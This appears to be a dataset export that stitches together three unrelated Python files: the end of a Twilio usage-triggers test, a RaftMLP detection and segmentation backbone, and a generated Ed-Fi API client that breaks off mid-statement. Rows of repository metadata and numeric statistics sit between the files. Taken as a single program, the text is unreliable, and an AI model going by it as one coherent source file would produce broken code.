actual = self.client.api.v2010.accounts(sid="ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") \
.usage \
.triggers(sid="UTaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa").delete()
self.assertTrue(actual)
def test_create_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.api.v2010.accounts(sid="ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") \
.usage \
.triggers.create(callback_url="https://example.com", trigger_value="trigger_value", usage_category="authy-authentications")
values = {
'CallbackUrl': "https://example.com",
'TriggerValue': "trigger_value",
'UsageCategory': "authy-authentications",
}
self.holodeck.assert_has_request(Request(
'post',
'https://api.twilio.com/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Triggers.json',
data=values,
))
def test_create_response(self):
self.holodeck.mock(Response(
201,
'''
{
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"api_version": "2010-04-01",
"callback_method": "GET",
"callback_url": "http://cap.com/streetfight",
"current_value": "0",
"date_created": "Sun, 06 Sep 2015 12:58:45 +0000",
"date_fired": null,
"date_updated": "Sun, 06 Sep 2015 12:58:45 +0000",
"friendly_name": "raphael-cluster-1441544325.86",
"recurring": "yearly",
"sid": "UTaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"trigger_by": "price",
"trigger_value": "50",
"uri": "/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Triggers/UTaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"usage_category": "totalprice",
"usage_record_uri": "/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Records?Category=totalprice"
}
'''
))
actual = self.client.api.v2010.accounts(sid="ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") \
.usage \
.triggers.create(callback_url="https://example.com", trigger_value="trigger_value", usage_category="authy-authentications")
self.assertIsNotNone(actual)
def test_list_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.api.v2010.accounts(sid="ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") \
.usage \
.triggers.list()
self.holodeck.assert_has_request(Request(
'get',
'https://api.twilio.com/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Triggers.json',
))
def test_read_full_response(self):
self.holodeck.mock(Response(
200,
'''
{
"end": 0,
"first_page_uri": "/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Triggers?PageSize=1&Page=0",
"last_page_uri": "/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Triggers?PageSize=1&Page=626",
"next_page_uri": null,
"num_pages": 627,
"page": 0,
"page_size": 1,
"previous_page_uri": null,
"start": 0,
"total": 627,
"uri": "/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Triggers",
"usage_triggers": [
{
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"api_version": "2010-04-01",
"callback_method": "GET",
"callback_url": "http://cap.com/streetfight",
"current_value": "0",
"date_created": "Sun, 06 Sep 2015 12:58:45 +0000",
"date_fired": null,
"date_updated": "Sun, 06 Sep 2015 12:58:45 +0000",
"friendly_name": "raphael-cluster-1441544325.86",
"recurring": "yearly",
"sid": "UTaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"trigger_by": "price",
"trigger_value": "50",
"uri": "/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Triggers/UTaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"usage_category": "totalprice",
"usage_record_uri": "/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Records?Category=totalprice"
}
]
}
'''
))
actual = self.client.api.v2010.accounts(sid="ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") \
.usage \
.triggers.list()
self.assertIsNotNone(actual)
def test_read_empty_response(self):
self.holodeck.mock(Response(
200,
'''
{
"end": 0,
"first_page_uri": "/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Triggers?PageSize=1&Page=0",
"last_page_uri": "/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Triggers?PageSize=1&Page=626",
"next_page_uri": null,
"num_pages": 627,
"page": 0,
"page_size": 1,
"previous_page_uri": null,
"start": 0,
"total": 627,
"uri": "/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Triggers",
"usage_triggers": []
}
'''
))
actual = self.client.api.v2010.accounts(sid="ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") \
.usage \
.triggers.list()
self.assertIsNotNone(actual)
| 42.729323
| 161
| 0.545311
| 903
| 11,366
| 6.719823
| 0.139535
| 0.192815
| 0.201384
| 0.050099
| 0.9265
| 0.910844
| 0.893869
| 0.893869
| 0.893869
| 0.893869
| 0
| 0.064512
| 0.338554
| 11,366
| 265
| 162
| 42.890566
| 0.742618
| 0.00959
| 0
| 0.754545
| 1
| 0.045455
| 0.246042
| 0.114037
| 0
| 0
| 0
| 0
| 0.145455
| 1
| 0.1
| false
| 0
| 0.036364
| 0
| 0.145455
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
541449afb8024b9df5dc0a7351dccf3d67f8a70e
| 10,897
|
py
|
Python
|
backbones/__init__.py
|
okojoalg/raft-mlp
|
6060d5d95e142acf80cea6d180adfb075cbe87d0
|
[
"Apache-2.0"
] | 20
|
2021-08-11T06:06:16.000Z
|
2022-03-25T12:34:08.000Z
|
backbones/__init__.py
|
okojoalg/raft-mlp
|
6060d5d95e142acf80cea6d180adfb075cbe87d0
|
[
"Apache-2.0"
] | null | null | null |
backbones/__init__.py
|
okojoalg/raft-mlp
|
6060d5d95e142acf80cea6d180adfb075cbe87d0
|
[
"Apache-2.0"
] | 4
|
2021-08-12T01:07:17.000Z
|
2022-02-16T21:32:40.000Z
|
import copy
import math
from einops import rearrange
from mmcv.runner import BaseModule
from mmdet.models.builder import BACKBONES as DET_BACKBONES
from mmseg.models.builder import BACKBONES as SEG_BACKBONES
from torch import nn
from libs.consts import ORIGINAL_TM, EMB_MIXER, SER_PM, EMB_CROSS_MLP
from libs.models import RaftMLP
class DetRaftMLP(RaftMLP, BaseModule):
def __init__(self,
layers,
dropout,
token_mixing_type,
embedding_type,
drop_path_rate,
init_cfg,
):
super(DetRaftMLP, self).__init__(
layers=layers,
in_channels=3,
pretrained_image_size=224,
num_classes=1000,
token_expansion_factor=2,
channel_expansion_factor=4,
dropout=dropout,
token_mixing_type=token_mixing_type,
embedding_type=embedding_type,
shortcut=False,
drop_path_rate=drop_path_rate
)
self._is_init = False
self.init_cfg = copy.deepcopy(init_cfg)
self.heads = nn.Identity()
self.classifier = nn.Identity()
self.features = []
def forward(self, input):
output = []
def forward_hook(module, inputs, outputs):
self.features.append(rearrange(outputs, "b (h w) c -> b c h w",
h=math.ceil(self.levels[0].h / self.levels[0].patch_size),
w=math.ceil(self.levels[0].w / self.levels[0].patch_size)).contiguous())
handles = [self.levels[0].fn[i].register_forward_hook(forward_hook) for i in (1,)]
for i, layer in enumerate(self.layers):
input = self.levels[i](input)
if i == 0:
output = self.features
else:
output.append(input.contiguous())
self.features = []
for handle in handles:
handle.remove()
return tuple(output)
@DET_BACKBONES.register_module()
class DetRaftMLPSmall(DetRaftMLP):
def __init__(self, *args, **kwargs):
super(DetRaftMLPSmall, self).__init__(
layers=[
{"depth": 2, "dim": 64, "patch_size": 4, "raft_size": 2, "embedding_kernels": [4, 8]},
{"depth": 2, "dim": 128, "patch_size": 2, "raft_size": 2, "embedding_kernels": [2, 4]},
{"depth": 6, "dim": 256, "patch_size": 2, "raft_size": 2, "embedding_kernels": [2, 4]},
{"depth": 2, "dim": 512, "patch_size": 2, "raft_size": 2, "embedding_kernels": [2]},
],
dropout=0.,
token_mixing_type=SER_PM,
embedding_type=EMB_CROSS_MLP,
drop_path_rate=0.,
*args, **kwargs
)
@DET_BACKBONES.register_module()
class DetRaftMLPMedium(DetRaftMLP):
def __init__(self, *args, **kwargs):
super(DetRaftMLPMedium, self).__init__(
layers=[
{"depth": 2, "dim": 96, "patch_size": 4, "raft_size": 2, "embedding_kernels": [4, 8]},
{"depth": 2, "dim": 192, "patch_size": 2, "raft_size": 2, "embedding_kernels": [2, 4]},
{"depth": 6, "dim": 384, "patch_size": 2, "raft_size": 2, "embedding_kernels": [2, 4]},
{"depth": 2, "dim": 768, "patch_size": 2, "raft_size": 2, "embedding_kernels": [2]},
],
dropout=0.,
token_mixing_type=SER_PM,
embedding_type=EMB_CROSS_MLP,
drop_path_rate=0.,
*args, **kwargs
)
@DET_BACKBONES.register_module()
class DetRaftMLPLarge(DetRaftMLP):
def __init__(self, *args, **kwargs):
super(DetRaftMLPLarge, self).__init__(
layers=[
{"depth": 2, "dim": 128, "patch_size": 4, "raft_size": 2, "embedding_kernels": [4, 8]},
{"depth": 2, "dim": 192, "patch_size": 2, "raft_size": 2, "embedding_kernels": [2, 4]},
{"depth": 6, "dim": 512, "patch_size": 2, "raft_size": 2, "embedding_kernels": [2, 4]},
{"depth": 2, "dim": 1024, "patch_size": 2, "raft_size": 2, "embedding_kernels": [2]},
],
dropout=0.,
token_mixing_type=SER_PM,
embedding_type=EMB_CROSS_MLP,
drop_path_rate=0.,
*args, **kwargs
)
@DET_BACKBONES.register_module()
class DetOrgMixer(DetRaftMLP):
def __init__(self, *args, **kwargs):
super(DetOrgMixer, self).__init__(
layers=[
{"depth": 12, "dim": 768, "patch_size": 16},
],
dropout=0.,
token_mixing_type=ORIGINAL_TM,
embedding_type=EMB_MIXER,
drop_path_rate=0.,
*args, **kwargs
)
def forward(self, input):
output = []
def forward_hook(module, inputs, outputs):
self.features.append(rearrange(outputs, "b (h w) c -> b c h w",
h=math.ceil(self.levels[0].h / self.levels[0].patch_size),
w=math.ceil(self.levels[0].w / self.levels[0].patch_size)).contiguous())
handles = [self.levels[0].fn[i].register_forward_hook(forward_hook) for i in (1, 5, 11)]
for i, layer in enumerate(self.layers):
input = self.levels[i](input)
if i == 0:
output = self.features
output.append(input.contiguous())
self.features = []
for handle in handles:
handle.remove()
return tuple(output)
class SegRaftMLP(RaftMLP, BaseModule):
def __init__(self,
layers,
dropout,
token_mixing_type,
embedding_type,
drop_path_rate,
init_cfg,
):
super(SegRaftMLP, self).__init__(
layers=layers,
in_channels=3,
pretrained_image_size=224,
num_classes=1000,
token_expansion_factor=2,
channel_expansion_factor=4,
dropout=dropout,
token_mixing_type=token_mixing_type,
embedding_type=embedding_type,
shortcut=False,
drop_path_rate=drop_path_rate
)
self._is_init = False
self.init_cfg = copy.deepcopy(init_cfg)
self.heads = nn.Identity()
self.classifier = nn.Identity()
self.features = []
def forward(self, input):
output = []
def forward_hook(module, inputs, outputs):
self.features.append(rearrange(outputs, "b (h w) c -> b c h w",
h=math.ceil(self.levels[0].h / self.levels[0].patch_size),
w=math.ceil(self.levels[0].w / self.levels[0].patch_size)).contiguous())
handles = [self.levels[0].fn[i].register_forward_hook(forward_hook) for i in (1,)]
for i, layer in enumerate(self.layers):
input = self.levels[i](input)
if i == 0:
output = self.features
else:
output.append(input.contiguous())
self.features = []
for handle in handles:
handle.remove()
return tuple(output)
@SEG_BACKBONES.register_module()
class SegRaftMLPSmall(SegRaftMLP):
def __init__(self, *args, **kwargs):
super(SegRaftMLPSmall, self).__init__(
layers=[
{"depth": 2, "dim": 64, "patch_size": 4, "raft_size": 2, "embedding_kernels": [4, 8]},
{"depth": 2, "dim": 128, "patch_size": 2, "raft_size": 2, "embedding_kernels": [2, 4]},
{"depth": 6, "dim": 256, "patch_size": 2, "raft_size": 2, "embedding_kernels": [2, 4]},
{"depth": 2, "dim": 512, "patch_size": 2, "raft_size": 2, "embedding_kernels": [2]},
],
dropout=0.,
token_mixing_type=SER_PM,
embedding_type=EMB_CROSS_MLP,
drop_path_rate=0.,
*args, **kwargs
)
@SEG_BACKBONES.register_module()
class SegRaftMLPMedium(SegRaftMLP):
def __init__(self, *args, **kwargs):
super(SegRaftMLPMedium, self).__init__(
layers=[
{"depth": 2, "dim": 96, "patch_size": 4, "raft_size": 2, "embedding_kernels": [4, 8]},
{"depth": 2, "dim": 192, "patch_size": 2, "raft_size": 2, "embedding_kernels": [2, 4]},
{"depth": 6, "dim": 384, "patch_size": 2, "raft_size": 2, "embedding_kernels": [2, 4]},
{"depth": 2, "dim": 768, "patch_size": 2, "raft_size": 2, "embedding_kernels": [2]},
],
dropout=0.,
token_mixing_type=SER_PM,
embedding_type=EMB_CROSS_MLP,
drop_path_rate=0.,
*args, **kwargs
)
@SEG_BACKBONES.register_module()
class SegRaftMLPLarge(SegRaftMLP):
def __init__(self, *args, **kwargs):
super(SegRaftMLPLarge, self).__init__(
layers=[
{"depth": 2, "dim": 128, "patch_size": 4, "raft_size": 2, "embedding_kernels": [4, 8]},
{"depth": 2, "dim": 192, "patch_size": 2, "raft_size": 2, "embedding_kernels": [2, 4]},
{"depth": 6, "dim": 512, "patch_size": 2, "raft_size": 2, "embedding_kernels": [2, 4]},
{"depth": 2, "dim": 1024, "patch_size": 2, "raft_size": 2, "embedding_kernels": [2]},
],
dropout=0.,
token_mixing_type=SER_PM,
embedding_type=EMB_CROSS_MLP,
drop_path_rate=0.,
*args, **kwargs
)
@SEG_BACKBONES.register_module()
class SegOrgMixer(SegRaftMLP):
def __init__(self, *args, **kwargs):
super(SegOrgMixer, self).__init__(
layers=[
{"depth": 12, "dim": 768, "patch_size": 16},
],
dropout=0.,
token_mixing_type=ORIGINAL_TM,
embedding_type=EMB_MIXER,
drop_path_rate=0.,
*args, **kwargs
)
def forward(self, input):
output = []
def forward_hook(module, inputs, outputs):
self.features.append(rearrange(outputs, "b (h w) c -> b c h w",
h=math.ceil(self.levels[0].h / self.levels[0].patch_size),
w=math.ceil(self.levels[0].w / self.levels[0].patch_size)).contiguous())
handles = [self.levels[0].fn[i].register_forward_hook(forward_hook) for i in (1, 5, 11)]
for i, layer in enumerate(self.layers):
input = self.levels[i](input)
if i == 0:
output = self.features
output.append(input.contiguous())
self.features = []
for handle in handles:
handle.remove()
return tuple(output)
| 38.101399
| 115
| 0.533358
| 1,237
| 10,897
| 4.440582
| 0.105093
| 0.03823
| 0.039323
| 0.078646
| 0.910249
| 0.888039
| 0.888039
| 0.835609
| 0.835609
| 0.835609
| 0
| 0.036732
| 0.330458
| 10,897
| 285
| 116
| 38.235088
| 0.716146
| 0
| 0
| 0.844622
| 0
| 0
| 0.107553
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071713
| false
| 0
| 0.035857
| 0
| 0.163347
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5459a4357fea29d72017c89972765af3065f78db
| 47,287
|
py
|
Python
|
src/v5.3/resources/swagger_client/api/staff_education_organization_assignment_associations_api.py
|
xmarcosx/edfi-notebook
|
0564ebdf1d0f45a9d25056e7e61369f0a837534d
|
[
"Apache-2.0"
] | 2
|
2021-04-27T17:18:17.000Z
|
2021-04-27T19:14:39.000Z
|
src/v5.3/resources/swagger_client/api/staff_education_organization_assignment_associations_api.py
|
xmarcosx/edfi-notebook
|
0564ebdf1d0f45a9d25056e7e61369f0a837534d
|
[
"Apache-2.0"
] | null | null | null |
src/v5.3/resources/swagger_client/api/staff_education_organization_assignment_associations_api.py
|
xmarcosx/edfi-notebook
|
0564ebdf1d0f45a9d25056e7e61369f0a837534d
|
[
"Apache-2.0"
] | 1
|
2022-01-06T09:43:11.000Z
|
2022-01-06T09:43:11.000Z
|
# coding: utf-8
"""
Ed-Fi Operational Data Store API
The Ed-Fi ODS / API enables applications to read and write education data stored in an Ed-Fi ODS through a secure REST interface. *** > *Note: Consumers of ODS / API information should sanitize all data for display and storage. The ODS / API provides reasonable safeguards against cross-site scripting attacks and other malicious content, but the platform does not and cannot guarantee that the data it contains is free of all potentially harmful content.* *** # noqa: E501
OpenAPI spec version: 3
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from swagger_client.api_client import ApiClient
class StaffEducationOrganizationAssignmentAssociationsApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def delete_staff_education_organization_assignment_association_by_id(self, id, **kwargs): # noqa: E501
"""Deletes an existing resource using the resource identifier. # noqa: E501
The DELETE operation is used to delete an existing resource by identifier. If the resource doesn't exist, an error will result (the resource will not be found). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_staff_education_organization_assignment_association_by_id(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: A resource identifier that uniquely identifies the resource. (required)
:param str if_match: The ETag header value used to prevent the DELETE from removing a resource modified by another consumer.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_staff_education_organization_assignment_association_by_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.delete_staff_education_organization_assignment_association_by_id_with_http_info(id, **kwargs) # noqa: E501
return data
def delete_staff_education_organization_assignment_association_by_id_with_http_info(self, id, **kwargs): # noqa: E501
"""Deletes an existing resource using the resource identifier. # noqa: E501
The DELETE operation is used to delete an existing resource by identifier. If the resource doesn't exist, an error will result (the resource will not be found). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_staff_education_organization_assignment_association_by_id_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: A resource identifier that uniquely identifies the resource. (required)
:param str if_match: The ETag header value used to prevent the DELETE from removing a resource modified by another consumer.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'if_match'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_staff_education_organization_assignment_association_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `delete_staff_education_organization_assignment_association_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
if 'if_match' in params:
header_params['If-Match'] = params['if_match'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2_client_credentials'] # noqa: E501
return self.api_client.call_api(
'/ed-fi/staffEducationOrganizationAssignmentAssociations/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def deletes_staff_education_organization_assignment_associations(self, **kwargs): # noqa: E501
"""Retrieves deleted resources based on change version. # noqa: E501
The DELETES operation is used to retrieve deleted resources. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.deletes_staff_education_organization_assignment_associations(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset: Indicates how many items should be skipped before returning results.
:param int limit: Indicates the maximum number of items that should be returned in the results.
:param int min_change_version: Used in synchronization to set sequence minimum ChangeVersion
:param int max_change_version: Used in synchronization to set sequence maximum ChangeVersion
:param str snapshot_identifier: Indicates the Snapshot-Identifier that should be used.
:return: list[DeletedResource]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.deletes_staff_education_organization_assignment_associations_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.deletes_staff_education_organization_assignment_associations_with_http_info(**kwargs) # noqa: E501
return data
def deletes_staff_education_organization_assignment_associations_with_http_info(self, **kwargs): # noqa: E501
"""Retrieves deleted resources based on change version. # noqa: E501
The DELETES operation is used to retrieve deleted resources. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.deletes_staff_education_organization_assignment_associations_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset: Indicates how many items should be skipped before returning results.
:param int limit: Indicates the maximum number of items that should be returned in the results.
:param int min_change_version: Used in synchronization to set sequence minimum ChangeVersion
:param int max_change_version: Used in synchronization to set sequence maximum ChangeVersion
:param str snapshot_identifier: Indicates the Snapshot-Identifier that should be used.
:return: list[DeletedResource]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['offset', 'limit', 'min_change_version', 'max_change_version', 'snapshot_identifier'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method deletes_staff_education_organization_assignment_associations" % key
)
params[key] = val
del params['kwargs']
if self.api_client.client_side_validation and ('limit' in params and params['limit'] > 500): # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `deletes_staff_education_organization_assignment_associations`, must be a value less than or equal to `500`") # noqa: E501
if self.api_client.client_side_validation and ('limit' in params and params['limit'] < 0): # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `deletes_staff_education_organization_assignment_associations`, must be a value greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'min_change_version' in params:
query_params.append(('minChangeVersion', params['min_change_version'])) # noqa: E501
if 'max_change_version' in params:
query_params.append(('maxChangeVersion', params['max_change_version'])) # noqa: E501
header_params = {}
if 'snapshot_identifier' in params:
header_params['Snapshot-Identifier'] = params['snapshot_identifier'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2_client_credentials'] # noqa: E501
return self.api_client.call_api(
'/ed-fi/staffEducationOrganizationAssignmentAssociations/deletes', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[DeletedResource]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_staff_education_organization_assignment_associations(self, **kwargs): # noqa: E501
"""Retrieves specific resources using the resource's property values (using the \"Get\" pattern). # noqa: E501
This GET operation provides access to resources using the \"Get\" search pattern. The values of any properties of the resource that are specified will be used to return all matching results (if it exists). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_staff_education_organization_assignment_associations(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset: Indicates how many items should be skipped before returning results.
:param int limit: Indicates the maximum number of items that should be returned in the results.
:param int min_change_version: Used in synchronization to set sequence minimum ChangeVersion
:param int max_change_version: Used in synchronization to set sequence maximum ChangeVersion
:param bool total_count: Indicates if the total number of items available should be returned in the 'Total-Count' header of the response. If set to false, 'Total-Count' header will not be provided.
:param str staff_classification_descriptor: The titles of employment, official status, or rank of education staff.
:param date begin_date: Month, day, and year of the start or effective date of a staff member's employment, contract, or relationship with the education organization.
:param int education_organization_id: The identifier assigned to an education organization.
:param str staff_unique_id: A unique alphanumeric code assigned to a staff.
:param str credential_identifier: Identifier or serial number assigned to the credential.
:param str state_of_issue_state_abbreviation_descriptor: The abbreviation for the name of the state (within the United States) or extra-state jurisdiction in which a license/credential was issued.
:param int employment_education_organization_id: The identifier assigned to an education organization.
:param str employment_status_descriptor: Reflects the type of employment or contract; for example: Probationary Contractual Substitute/temporary Tenured or permanent Volunteer/no contract ...
:param date employment_hire_date: The month, day, and year on which an individual was hired for a position.
:param date end_date: Month, day, and year of the end or termination date of a staff member's employment, contract, or relationship with the education organization.
:param float full_time_equivalency: The ratio between the hours of work expected in a position and the hours of work normally expected in a full-time position in the same setting.
:param str id:
:param int order_of_assignment: Describes whether the assignment is this the staff member's primary assignment, secondary assignment, etc.
:param str position_title: The descriptive name of an individual's position.
:param str snapshot_identifier: Indicates the Snapshot-Identifier that should be used.
:return: list[EdFiStaffEducationOrganizationAssignmentAssociation]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_staff_education_organization_assignment_associations_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_staff_education_organization_assignment_associations_with_http_info(**kwargs) # noqa: E501
return data
def get_staff_education_organization_assignment_associations_with_http_info(self, **kwargs): # noqa: E501
"""Retrieves specific resources using the resource's property values (using the \"Get\" pattern). # noqa: E501
This GET operation provides access to resources using the \"Get\" search pattern. The values of any properties of the resource that are specified will be used to return all matching results (if it exists). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_staff_education_organization_assignment_associations_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset: Indicates how many items should be skipped before returning results.
:param int limit: Indicates the maximum number of items that should be returned in the results.
:param int min_change_version: Used in synchronization to set sequence minimum ChangeVersion
:param int max_change_version: Used in synchronization to set sequence maximum ChangeVersion
:param bool total_count: Indicates if the total number of items available should be returned in the 'Total-Count' header of the response. If set to false, 'Total-Count' header will not be provided.
:param str staff_classification_descriptor: The titles of employment, official status, or rank of education staff.
:param date begin_date: Month, day, and year of the start or effective date of a staff member's employment, contract, or relationship with the education organization.
:param int education_organization_id: The identifier assigned to an education organization.
:param str staff_unique_id: A unique alphanumeric code assigned to a staff.
:param str credential_identifier: Identifier or serial number assigned to the credential.
:param str state_of_issue_state_abbreviation_descriptor: The abbreviation for the name of the state (within the United States) or extra-state jurisdiction in which a license/credential was issued.
:param int employment_education_organization_id: The identifier assigned to an education organization.
:param str employment_status_descriptor: Reflects the type of employment or contract; for example: Probationary Contractual Substitute/temporary Tenured or permanent Volunteer/no contract ...
:param date employment_hire_date: The month, day, and year on which an individual was hired for a position.
:param date end_date: Month, day, and year of the end or termination date of a staff member's employment, contract, or relationship with the education organization.
:param float full_time_equivalency: The ratio between the hours of work expected in a position and the hours of work normally expected in a full-time position in the same setting.
:param str id:
:param int order_of_assignment: Describes whether the assignment is this the staff member's primary assignment, secondary assignment, etc.
:param str position_title: The descriptive name of an individual's position.
:param str snapshot_identifier: Indicates the Snapshot-Identifier that should be used.
:return: list[EdFiStaffEducationOrganizationAssignmentAssociation]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['offset', 'limit', 'min_change_version', 'max_change_version', 'total_count', 'staff_classification_descriptor', 'begin_date', 'education_organization_id', 'staff_unique_id', 'credential_identifier', 'state_of_issue_state_abbreviation_descriptor', 'employment_education_organization_id', 'employment_status_descriptor', 'employment_hire_date', 'end_date', 'full_time_equivalency', 'id', 'order_of_assignment', 'position_title', 'snapshot_identifier'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_staff_education_organization_assignment_associations" % key
)
params[key] = val
del params['kwargs']
if self.api_client.client_side_validation and ('limit' in params and params['limit'] > 500): # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `get_staff_education_organization_assignment_associations`, must be a value less than or equal to `500`") # noqa: E501
if self.api_client.client_side_validation and ('limit' in params and params['limit'] < 0): # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `get_staff_education_organization_assignment_associations`, must be a value greater than or equal to `0`") # noqa: E501
if self.api_client.client_side_validation and ('staff_classification_descriptor' in params and
len(params['staff_classification_descriptor']) > 306):
